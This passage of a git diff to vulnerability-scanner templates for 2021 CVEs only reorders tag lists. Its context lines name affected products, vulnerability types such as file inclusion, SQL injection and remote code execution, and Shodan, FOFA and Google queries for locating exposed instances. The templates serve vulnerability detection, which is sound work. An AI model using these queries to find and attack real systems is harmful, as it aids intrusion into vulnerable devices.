product: biqsdrive
- tags: lfi,biqsdrive,cve,cve2021,biqs
+ tags: cve2021,cve,lfi,biqsdrive,biqs
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-39501.yaml b/http/cves/2021/CVE-2021-39501.yaml
index 9a43276813..807ea26f23 100644
--- a/http/cves/2021/CVE-2021-39501.yaml
+++ b/http/cves/2021/CVE-2021-39501.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: eyoucms
product: eyoucms
- tags: cve,cve2021,redirect,eyoucms,cms
+ tags: cve2021,cve,redirect,eyoucms,cms
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-40149.yaml b/http/cves/2021/CVE-2021-40149.yaml
index 89d5cc3a6b..c6fe557a38 100644
--- a/http/cves/2021/CVE-2021-40149.yaml
+++ b/http/cves/2021/CVE-2021-40149.yaml
@@ -29,7 +29,7 @@ info:
vendor: reolink
product: e1_zoom_firmware
shodan-query: http.title:"Reolink"
- tags: exposure,unauth,packetstorm,cve,cve2021,reolink,camera,iot
+ tags: cve2021,cve,exposure,unauth,packetstorm,reolink,camera,iot
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml
index e16e915158..c2e550af65 100644
--- a/http/cves/2021/CVE-2021-40150.yaml
+++ b/http/cves/2021/CVE-2021-40150.yaml
@@ -29,7 +29,7 @@ info:
vendor: reolink
product: e1_zoom_firmware
shodan-query: http.title:"Reolink"
- tags: cve,cve2021,reolink,camera,exposure,iot
+ tags: cve2021,cve,reolink,camera,exposure,iot
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-40438.yaml b/http/cves/2021/CVE-2021-40438.yaml
index ee96b6f9f8..4b7a5e2070 100644
--- a/http/cves/2021/CVE-2021-40438.yaml
+++ b/http/cves/2021/CVE-2021-40438.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: apache
product: http_server
- tags: cve,cve2021,ssrf,apache,mod-proxy,kev
+ tags: cve2021,cve,ssrf,apache,mod-proxy,kev
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml
index 6b479e15fa..e2ed55af82 100644
--- a/http/cves/2021/CVE-2021-40539.yaml
+++ b/http/cves/2021/CVE-2021-40539.yaml
@@ -26,7 +26,7 @@ info:
max-request: 4
vendor: zohocorp
product: manageengine_adselfservice_plus
- tags: cve,cve2021,rce,ad,intrusive,manageengine,kev,zohocorp
+ tags: cve2021,cve,rce,ad,intrusive,manageengine,kev,zohocorp
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml
index f8d32dfff9..97bb2b362d 100644
--- a/http/cves/2021/CVE-2021-40542.yaml
+++ b/http/cves/2021/CVE-2021-40542.yaml
@@ -26,7 +26,7 @@ info:
vendor: os4ed
product: opensis
shodan-query: http.title:"openSIS"
- tags: xss,cve,cve2021,opensis,os4ed
+ tags: cve2021,cve,xss,opensis,os4ed
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-40661.yaml b/http/cves/2021/CVE-2021-40661.yaml
index bed9a85261..e4ecfd33c2 100644
--- a/http/cves/2021/CVE-2021-40661.yaml
+++ b/http/cves/2021/CVE-2021-40661.yaml
@@ -30,7 +30,7 @@ info:
product: ind780_firmware
shodan-query: IND780
google-query: inurl:excalweb.dll
- tags: cve,cve2021,ind780,lfi,mt
+ tags: cve2021,cve,ind780,lfi,mt
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml
index f01659ce61..aa05c0f5bf 100644
--- a/http/cves/2021/CVE-2021-40822.yaml
+++ b/http/cves/2021/CVE-2021-40822.yaml
@@ -30,7 +30,7 @@ info:
product: geoserver
shodan-query: title:"GeoServer"
fofa-query: app="GeoServer"
- tags: cve,cve2021,ssrf,geoserver,osgeo
+ tags: cve2021,cve,ssrf,geoserver,osgeo
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-40856.yaml b/http/cves/2021/CVE-2021-40856.yaml
index 4dc2bdf7ce..46de880123 100644
--- a/http/cves/2021/CVE-2021-40856.yaml
+++ b/http/cves/2021/CVE-2021-40856.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: auerswald
product: comfortel_3600_ip_firmware
- tags: packetstorm,cve,cve2021,comfortel,auth-bypass,auerswald
+ tags: cve2021,cve,packetstorm,comfortel,auth-bypass,auerswald
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-40859.yaml b/http/cves/2021/CVE-2021-40859.yaml
index 5125fc2cf8..589f6d1ab7 100644
--- a/http/cves/2021/CVE-2021-40859.yaml
+++ b/http/cves/2021/CVE-2021-40859.yaml
@@ -26,7 +26,7 @@ info:
vendor: auerswald
product: compact_5500r_firmware
fofa-query: '"auerswald"'
- tags: cve,cve2021,iot,unauth,voip,auerswald
+ tags: cve2021,cve,iot,unauth,voip,auerswald
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-40868.yaml b/http/cves/2021/CVE-2021-40868.yaml
index 2fed6068f2..bab112920b 100644
--- a/http/cves/2021/CVE-2021-40868.yaml
+++ b/http/cves/2021/CVE-2021-40868.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: cloudron
product: cloudron
- tags: cve,cve2021,xss,cloudron,packetstorm
+ tags: cve2021,cve,xss,cloudron,packetstorm
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-40870.yaml b/http/cves/2021/CVE-2021-40870.yaml
index 0edc81c8d7..5a68ec9fdc 100644
--- a/http/cves/2021/CVE-2021-40870.yaml
+++ b/http/cves/2021/CVE-2021-40870.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: aviatrix
product: controller
- tags: intrusive,packetstorm,cve,cve2021,rce,aviatrix,kev,fileupload
+ tags: cve2021,cve,intrusive,packetstorm,rce,aviatrix,kev,fileupload
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml
index 6e9a918be3..4b3da6b8e0 100644
--- a/http/cves/2021/CVE-2021-40875.yaml
+++ b/http/cves/2021/CVE-2021-40875.yaml
@@ -28,7 +28,7 @@ info:
vendor: gurock
product: testrail
shodan-query: http.html:"TestRail"
- tags: cve,cve2021,exposure,gurock,testrail
+ tags: cve2021,cve,exposure,gurock,testrail
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-40908.yaml b/http/cves/2021/CVE-2021-40908.yaml
index 31274b8976..52de03c510 100644
--- a/http/cves/2021/CVE-2021-40908.yaml
+++ b/http/cves/2021/CVE-2021-40908.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: purchase_order_management_system_project
product: purchase_order_management_system
- tags: cve,cve2021,sqli,purchase-order,poms,purchase_order_management_system_project
+ tags: cve2021,cve,sqli,purchase-order,poms,purchase_order_management_system_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-40960.yaml b/http/cves/2021/CVE-2021-40960.yaml
index 96144a21da..18241dace1 100644
--- a/http/cves/2021/CVE-2021-40960.yaml
+++ b/http/cves/2021/CVE-2021-40960.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: galera
product: galera_webtemplate
- tags: cve,cve2021,lfi,galera
+ tags: cve2021,cve,lfi,galera
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml
index 2e6825af10..bb89c61a8c 100644
--- a/http/cves/2021/CVE-2021-40968.yaml
+++ b/http/cves/2021/CVE-2021-40968.yaml
@@ -28,7 +28,7 @@ info:
vendor: spotweb_project
product: spotweb
shodan-query: title:"SpotWeb - overview"
- tags: cve,cve2021,xss,spotweb,spotweb_project
+ tags: cve2021,cve,xss,spotweb,spotweb_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml
index 2b78aaa2f1..2b3aa1eac4 100644
--- a/http/cves/2021/CVE-2021-40969.yaml
+++ b/http/cves/2021/CVE-2021-40969.yaml
@@ -28,7 +28,7 @@ info:
vendor: spotweb_project
product: spotweb
shodan-query: title:"SpotWeb - overview"
- tags: cve,cve2021,xss,spotweb,spotweb_project
+ tags: cve2021,cve,xss,spotweb,spotweb_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml
index b5a48a7043..146e4201bc 100644
--- a/http/cves/2021/CVE-2021-40970.yaml
+++ b/http/cves/2021/CVE-2021-40970.yaml
@@ -28,7 +28,7 @@ info:
vendor: spotweb_project
product: spotweb
shodan-query: title:"SpotWeb - overview"
- tags: cve,cve2021,xss,spotweb,spotweb_project
+ tags: cve2021,cve,xss,spotweb,spotweb_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml
index 76c2a8837b..b8b169de21 100644
--- a/http/cves/2021/CVE-2021-40971.yaml
+++ b/http/cves/2021/CVE-2021-40971.yaml
@@ -28,7 +28,7 @@ info:
vendor: spotweb_project
product: spotweb
shodan-query: title:"SpotWeb - overview"
- tags: cve,cve2021,xss,spotweb,spotweb_project
+ tags: cve2021,cve,xss,spotweb,spotweb_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml
index d911bd5ec8..66085a5400 100644
--- a/http/cves/2021/CVE-2021-40973.yaml
+++ b/http/cves/2021/CVE-2021-40973.yaml
@@ -28,7 +28,7 @@ info:
vendor: spotweb_project
product: spotweb
shodan-query: title:"SpotWeb - overview"
- tags: cve,cve2021,xss,spotweb,spotweb_project
+ tags: cve2021,cve,xss,spotweb,spotweb_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-40978.yaml b/http/cves/2021/CVE-2021-40978.yaml
index a98b9a6c66..a1d0cbfe57 100644
--- a/http/cves/2021/CVE-2021-40978.yaml
+++ b/http/cves/2021/CVE-2021-40978.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: mkdocs
product: mkdocs
- tags: cve,cve2021,mkdocs,lfi
+ tags: cve2021,cve,mkdocs,lfi
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml
index 47c25a1bb1..115c31e0a2 100644
--- a/http/cves/2021/CVE-2021-41174.yaml
+++ b/http/cves/2021/CVE-2021-41174.yaml
@@ -27,7 +27,7 @@ info:
vendor: grafana
product: grafana
shodan-query: title:"Grafana"
- tags: cve,cve2021,grafana,xss
+ tags: cve2021,cve,grafana,xss
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml
index d35994affc..578a4a31c8 100644
--- a/http/cves/2021/CVE-2021-41192.yaml
+++ b/http/cves/2021/CVE-2021-41192.yaml
@@ -27,7 +27,7 @@ info:
vendor: "redash"
product: "redash"
shodan-query: http.favicon.hash:698624197
- tags: hackerone,cve,cve2021,redash,auth-bypass
+ tags: cve2021,cve,hackerone,redash,auth-bypass
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-41266.yaml b/http/cves/2021/CVE-2021-41266.yaml
index adaa1bf273..8ce9fdd196 100644
--- a/http/cves/2021/CVE-2021-41266.yaml
+++ b/http/cves/2021/CVE-2021-41266.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: min
product: minio_console
- tags: cve,cve2021,minio,min
+ tags: cve2021,cve,minio,min
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml
index 071f741daa..f37b0a7809 100644
--- a/http/cves/2021/CVE-2021-41277.yaml
+++ b/http/cves/2021/CVE-2021-41277.yaml
@@ -27,7 +27,7 @@ info:
product: metabase
shodan-query: http.title:"Metabase"
fofa-query: app="Metabase"
- tags: cve,cve2021,metabase,lfi
+ tags: cve2021,cve,metabase,lfi
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-41282.yaml b/http/cves/2021/CVE-2021-41282.yaml
index f10e0af819..35faaf7525 100644
--- a/http/cves/2021/CVE-2021-41282.yaml
+++ b/http/cves/2021/CVE-2021-41282.yaml
@@ -28,7 +28,7 @@ info:
max-request: 4
vendor: pfsense
product: pfsense
- tags: cve,cve2021,pfsense,rce,authenticated
+ tags: cve2021,cve,pfsense,rce,authenticated
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-41291.yaml b/http/cves/2021/CVE-2021-41291.yaml
index f0cde69d4a..c54df08730 100644
--- a/http/cves/2021/CVE-2021-41291.yaml
+++ b/http/cves/2021/CVE-2021-41291.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: ecoa
product: ecs_router_controller-ecs_firmware
- tags: cve,cve2021,ecoa,lfi,traversal
+ tags: cve2021,cve,ecoa,lfi,traversal
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-41293.yaml b/http/cves/2021/CVE-2021-41293.yaml
index c385c197dd..48f385a46b 100644
--- a/http/cves/2021/CVE-2021-41293.yaml
+++ b/http/cves/2021/CVE-2021-41293.yaml
@@ -23,7 +23,7 @@ info:
max-request: 1
vendor: ecoa
product: ecs_router_controller-ecs_firmware
- tags: cve,cve2021,ecoa,lfi,disclosure
+ tags: cve2021,cve,ecoa,lfi,disclosure
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-41381.yaml b/http/cves/2021/CVE-2021-41381.yaml
index 938c6510ae..e0b0a2b8c8 100644
--- a/http/cves/2021/CVE-2021-41381.yaml
+++ b/http/cves/2021/CVE-2021-41381.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: payara
product: micro_community
- tags: cve,cve2021,payara,lfi,packetstorm
+ tags: cve2021,cve,payara,lfi,packetstorm
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml
index 0c6e52fb9d..5e1f1c3579 100644
--- a/http/cves/2021/CVE-2021-41432.yaml
+++ b/http/cves/2021/CVE-2021-41432.yaml
@@ -27,7 +27,7 @@ info:
vendor: flatpress
product: flatpress
shodan-query: http.html:"Flatpress"
- tags: cve,cve2021,flatpress,xss,authenticated,oss,intrusive
+ tags: cve2021,cve,flatpress,xss,authenticated,oss,intrusive
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-41460.yaml b/http/cves/2021/CVE-2021-41460.yaml
index 9bd6329978..f53717b38d 100644
--- a/http/cves/2021/CVE-2021-41460.yaml
+++ b/http/cves/2021/CVE-2021-41460.yaml
@@ -27,7 +27,7 @@ info:
vendor: shopex
product: ecshop
fofa-query: product="ECShop"
- tags: cve,cve2021,cnvd,cnvd2020,ecshop,sqli,shopex
+ tags: cve2021,cve,cnvd,cnvd2020,ecshop,sqli,shopex
variables:
num: "999999999"
diff --git a/http/cves/2021/CVE-2021-41467.yaml b/http/cves/2021/CVE-2021-41467.yaml
index 21aa2a3f99..6481ab17ea 100644
--- a/http/cves/2021/CVE-2021-41467.yaml
+++ b/http/cves/2021/CVE-2021-41467.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: justwriting_project
product: justwriting
- tags: cve,cve2021,justwriting,xss,justwriting_project
+ tags: cve2021,cve,justwriting,xss,justwriting_project
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-41569.yaml b/http/cves/2021/CVE-2021-41569.yaml
index b8231993e6..98e047e073 100644
--- a/http/cves/2021/CVE-2021-41569.yaml
+++ b/http/cves/2021/CVE-2021-41569.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: sas
product: sas\/intrnet
- tags: cve,cve2021,sas,lfi
+ tags: cve2021,cve,sas,lfi
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-41648.yaml b/http/cves/2021/CVE-2021-41648.yaml
index bdfdb05a13..90f6823556 100644
--- a/http/cves/2021/CVE-2021-41648.yaml
+++ b/http/cves/2021/CVE-2021-41648.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: online-shopping-system-advanced_project
product: online-shopping-system-advanced
- tags: cve2021,sqli,packetstorm,cve,online-shopping-system-advanced_project
+ tags: cve2021,cve,sqli,packetstorm,online-shopping-system-advanced_project
http:
- method: POST
diff --git a/http/cves/2021/CVE-2021-41649.yaml b/http/cves/2021/CVE-2021-41649.yaml
index 81a06bcf17..44c6b838fa 100644
--- a/http/cves/2021/CVE-2021-41649.yaml
+++ b/http/cves/2021/CVE-2021-41649.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: online-shopping-system-advanced_project
product: online-shopping-system-advanced
- tags: cve,cve2021,sqli,injection,online-shopping-system-advanced_project
+ tags: cve2021,cve,sqli,injection,online-shopping-system-advanced_project
http:
- method: POST
diff --git a/http/cves/2021/CVE-2021-41653.yaml b/http/cves/2021/CVE-2021-41653.yaml
index 30b547e174..7f2bf7f7f0 100644
--- a/http/cves/2021/CVE-2021-41653.yaml
+++ b/http/cves/2021/CVE-2021-41653.yaml
@@ -25,7 +25,7 @@ info:
max-request: 2
vendor: tp-link
product: tl-wr840n_firmware
- tags: cve,cve2021,tplink,rce,router,tp-link
+ tags: cve2021,cve,tplink,rce,router,tp-link
variables:
useragent: '{{rand_base(6)}}'
diff --git a/http/cves/2021/CVE-2021-41691.yaml b/http/cves/2021/CVE-2021-41691.yaml
index c7901cff2a..1247604ed2 100644
--- a/http/cves/2021/CVE-2021-41691.yaml
+++ b/http/cves/2021/CVE-2021-41691.yaml
@@ -17,7 +17,7 @@ info:
cve-id: CVE-2021-41691
metadata:
max-request: 2
- tags: sqli,auth,edb,cve,cve2021,opensis
+ tags: cve,cve2021,sqli,auth,edb,opensis
variables:
num: "999999999"
diff --git a/http/cves/2021/CVE-2021-41749.yaml b/http/cves/2021/CVE-2021-41749.yaml
index 979b798ee2..8618d6597e 100644
--- a/http/cves/2021/CVE-2021-41749.yaml
+++ b/http/cves/2021/CVE-2021-41749.yaml
@@ -25,7 +25,7 @@ info:
product: seomatic
framework: craft_cms
shodan-query: 'X-Powered-By: Craft CMS html:"SEOmatic"'
- tags: cve,cve2021,craftcms,cms,ssti,nystudio107,craft_cms
+ tags: cve2021,cve,craftcms,cms,ssti,nystudio107,craft_cms
variables:
num1: "{{rand_int(40000, 44800)}}"
num2: "{{rand_int(40000, 44800)}}"
diff --git a/http/cves/2021/CVE-2021-41773.yaml b/http/cves/2021/CVE-2021-41773.yaml
index 0076708788..d6505e6f6e 100644
--- a/http/cves/2021/CVE-2021-41773.yaml
+++ b/http/cves/2021/CVE-2021-41773.yaml
@@ -31,7 +31,7 @@ info:
vendor: apache
product: http_server
shodan-query: Apache 2.4.49
- tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev
+ tags: cve2021,cve,lfi,rce,apache,misconfig,traversal,kev
variables:
cmd: "echo COP-37714-1202-EVC | rev"
diff --git a/http/cves/2021/CVE-2021-41826.yaml b/http/cves/2021/CVE-2021-41826.yaml
index fe87253116..4c44facc0f 100644
--- a/http/cves/2021/CVE-2021-41826.yaml
+++ b/http/cves/2021/CVE-2021-41826.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: place
product: placeos_authentication
- tags: redirect,edb,cve,packetstorm,cve2021,placeos,place
+ tags: cve2021,cve,redirect,edb,packetstorm,placeos,place
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-41878.yaml b/http/cves/2021/CVE-2021-41878.yaml
index 0d58028c8b..21d0faeffb 100644
--- a/http/cves/2021/CVE-2021-41878.yaml
+++ b/http/cves/2021/CVE-2021-41878.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: hkurl
product: i-panel_administration_system
- tags: cve,cve2021,ipanel,xss,packetstorm,hkurl
+ tags: cve2021,cve,ipanel,xss,packetstorm,hkurl
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-4191.yaml b/http/cves/2021/CVE-2021-4191.yaml
index 19daa047a5..cfa8d22f0a 100644
--- a/http/cves/2021/CVE-2021-4191.yaml
+++ b/http/cves/2021/CVE-2021-4191.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: gitlab
product: gitlab
- tags: cve,cve2021,gitlab,api,graphql,enum,unauth
+ tags: cve2021,cve,gitlab,api,graphql,enum,unauth
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-41951.yaml b/http/cves/2021/CVE-2021-41951.yaml
index c51ee703cc..b3de31ccf3 100644
--- a/http/cves/2021/CVE-2021-41951.yaml
+++ b/http/cves/2021/CVE-2021-41951.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: montala
product: resourcespace
- tags: cve,cve2021,xss,resourcespace,montala
+ tags: cve2021,cve,xss,resourcespace,montala
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml
index 0531444d70..6b4cea0f7f 100644
--- a/http/cves/2021/CVE-2021-42013.yaml
+++ b/http/cves/2021/CVE-2021-42013.yaml
@@ -28,7 +28,7 @@ info:
max-request: 3
vendor: apache
product: http_server
- tags: cve,cve2021,lfi,apache,rce,misconfig,traversal,kev
+ tags: cve2021,cve,lfi,apache,rce,misconfig,traversal,kev
variables:
cmd: "echo COP-37714-1202-EVC | rev"
diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml
index f25f10a618..549c067649 100644
--- a/http/cves/2021/CVE-2021-42063.yaml
+++ b/http/cves/2021/CVE-2021-42063.yaml
@@ -30,7 +30,7 @@ info:
product: knowledge_warehouse
shodan-query: http.favicon.hash:-266008933
zoomeye-query: +app:"SAP NetWeaver Application Server httpd
- tags: cve2021,sap,xss,seclists,packetstorm,cve
+ tags: cve2021,cve,sap,xss,seclists,packetstorm
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-42071.yaml b/http/cves/2021/CVE-2021-42071.yaml
index 6cf128dbde..ec70f95195 100644
--- a/http/cves/2021/CVE-2021-42071.yaml
+++ b/http/cves/2021/CVE-2021-42071.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: visual-tools
product: dvr_vx16_firmware
- tags: edb,cve,cve2021,visualtools,rce,oast,injection,visual-tools
+ tags: cve2021,cve,edb,visualtools,rce,oast,injection,visual-tools
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-42192.yaml b/http/cves/2021/CVE-2021-42192.yaml
index cfcf37e12d..c1079a221f 100644
--- a/http/cves/2021/CVE-2021-42192.yaml
+++ b/http/cves/2021/CVE-2021-42192.yaml
@@ -27,7 +27,7 @@ info:
max-request: 3
vendor: konga_project
product: konga
- tags: authenticated,edb,cve,cve2021,konga,intrusive,konga_project
+ tags: cve2021,cve,authenticated,edb,konga,intrusive,konga_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml
index 956cf576c6..47622a9401 100644
--- a/http/cves/2021/CVE-2021-42237.yaml
+++ b/http/cves/2021/CVE-2021-42237.yaml
@@ -27,7 +27,7 @@ info:
vendor: sitecore
product: experience_platform
shodan-query: http.title:"SiteCore"
- tags: packetstorm,cve,cve2021,rce,sitecore,deserialization,oast,kev
+ tags: cve2021,cve,packetstorm,rce,sitecore,deserialization,oast,kev
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-42258.yaml b/http/cves/2021/CVE-2021-42258.yaml
index 6edbcf46ec..e97b893a07 100644
--- a/http/cves/2021/CVE-2021-42258.yaml
+++ b/http/cves/2021/CVE-2021-42258.yaml
@@ -24,7 +24,7 @@ info:
max-request: 2
vendor: bqe
product: billquick_web_suite
- tags: cve,cve2021,sqli,billquick,kev,bqe
+ tags: cve2021,cve,sqli,billquick,kev,bqe
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-42551.yaml b/http/cves/2021/CVE-2021-42551.yaml
index aa45f2a735..452ced7671 100644
--- a/http/cves/2021/CVE-2021-42551.yaml
+++ b/http/cves/2021/CVE-2021-42551.yaml
@@ -24,7 +24,7 @@ info:
max-request: 2
vendor: alcoda
product: netbiblio
- tags: cve,cve2021,xss,netbiblio,alcoda
+ tags: cve2021,cve,xss,netbiblio,alcoda
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-42565.yaml b/http/cves/2021/CVE-2021-42565.yaml
index d810f28903..2012fde02c 100644
--- a/http/cves/2021/CVE-2021-42565.yaml
+++ b/http/cves/2021/CVE-2021-42565.yaml
@@ -25,7 +25,7 @@ info:
max-request: 2
vendor: myfactory
product: fms
- tags: cve,cve2021,myfactory,xss
+ tags: cve2021,cve,myfactory,xss
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-42566.yaml b/http/cves/2021/CVE-2021-42566.yaml
index 43133d89c8..496103128c 100644
--- a/http/cves/2021/CVE-2021-42566.yaml
+++ b/http/cves/2021/CVE-2021-42566.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: myfactory
product: fms
- tags: cve,cve2021,myfactory,xss
+ tags: cve2021,cve,myfactory,xss
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml
index 29b8ca8071..bf51477da4 100644
--- a/http/cves/2021/CVE-2021-42567.yaml
+++ b/http/cves/2021/CVE-2021-42567.yaml
@@ -28,7 +28,7 @@ info:
vendor: apereo
product: central_authentication_service
shodan-query: http.title:'CAS - Central Authentication Service'
- tags: cve,cve2021,apereo,xss,cas
+ tags: cve2021,cve,apereo,xss,cas
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-42627.yaml b/http/cves/2021/CVE-2021-42627.yaml
index 8e825358f1..b784094147 100644
--- a/http/cves/2021/CVE-2021-42627.yaml
+++ b/http/cves/2021/CVE-2021-42627.yaml
@@ -29,7 +29,7 @@ info:
vendor: dlink
product: dir-615_firmware
shodan-query: http.title:"Roteador Wireless"
- tags: cve,cve2021,d-link,router,unauth,dir-615,roteador,dlink
+ tags: cve2021,cve,d-link,router,unauth,dir-615,roteador,dlink
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-42663.yaml b/http/cves/2021/CVE-2021-42663.yaml
index 60f1eb57ea..15299c2bb5 100644
--- a/http/cves/2021/CVE-2021-42663.yaml
+++ b/http/cves/2021/CVE-2021-42663.yaml
@@ -28,7 +28,7 @@ info:
max-request: 2
vendor: online_event_booking_and_reservation_system_project
product: online_event_booking_and_reservation_system
- tags: cve,cve2021,xss,online_event_booking_and_reservation_system_project
+ tags: cve2021,cve,xss,online_event_booking_and_reservation_system_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-42887.yaml b/http/cves/2021/CVE-2021-42887.yaml
index c12bc5a9a6..89f8792c0e 100644
--- a/http/cves/2021/CVE-2021-42887.yaml
+++ b/http/cves/2021/CVE-2021-42887.yaml
@@ -26,7 +26,7 @@ info:
vendor: totolink
product: ex1200t_firmware
shodan-query: title:"TOTOLINK"
- tags: totolink,auth-bypass,cve,cve2021,router
+ tags: cve2021,cve,totolink,auth-bypass,router
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml
index bc6d844390..bfbe4e8e16 100644
--- a/http/cves/2021/CVE-2021-43287.yaml
+++ b/http/cves/2021/CVE-2021-43287.yaml
@@ -27,7 +27,7 @@ info:
vendor: thoughtworks
product: gocd
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
- tags: cve,cve2021,go,lfi,gocd,thoughtworks
+ tags: cve2021,cve,go,lfi,gocd,thoughtworks
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-43495.yaml b/http/cves/2021/CVE-2021-43495.yaml
index 86fd801224..9555dac969 100644
--- a/http/cves/2021/CVE-2021-43495.yaml
+++ b/http/cves/2021/CVE-2021-43495.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: alquistai
product: alquist
- tags: cve,cve2021,lfi,alquist,alquistai
+ tags: cve2021,cve,lfi,alquist,alquistai
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-43496.yaml b/http/cves/2021/CVE-2021-43496.yaml
index 30766fe199..8e82cde1ce 100644
--- a/http/cves/2021/CVE-2021-43496.yaml
+++ b/http/cves/2021/CVE-2021-43496.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: clustering_project
product: clustering
- tags: cve,cve2021,lfi,clustering,clustering_project
+ tags: cve2021,cve,lfi,clustering,clustering_project
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-43510.yaml b/http/cves/2021/CVE-2021-43510.yaml
index cc05909a0a..548cb476df 100644
--- a/http/cves/2021/CVE-2021-43510.yaml
+++ b/http/cves/2021/CVE-2021-43510.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: simple_client_management_system_project
product: simple_client_management_system
- tags: cve,cve2021,simpleclientmanagement,sqli,auth-bypass,simple_client_management_system_project
+ tags: cve2021,cve,simpleclientmanagement,sqli,auth-bypass,simple_client_management_system_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml
index 7e698a9305..65c3d7fb65 100644
--- a/http/cves/2021/CVE-2021-43574.yaml
+++ b/http/cves/2021/CVE-2021-43574.yaml
@@ -29,7 +29,7 @@ info:
vendor: atmail
product: atmail
shodan-query: http.html:"Powered by Atmail"
- tags: cve,cve2021,atmail,xss
+ tags: cve2021,cve,atmail,xss
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-43734.yaml b/http/cves/2021/CVE-2021-43734.yaml
index fed685d6c4..22cb89324e 100644
--- a/http/cves/2021/CVE-2021-43734.yaml
+++ b/http/cves/2021/CVE-2021-43734.yaml
@@ -27,7 +27,7 @@ info:
vendor: keking
product: kkfileview
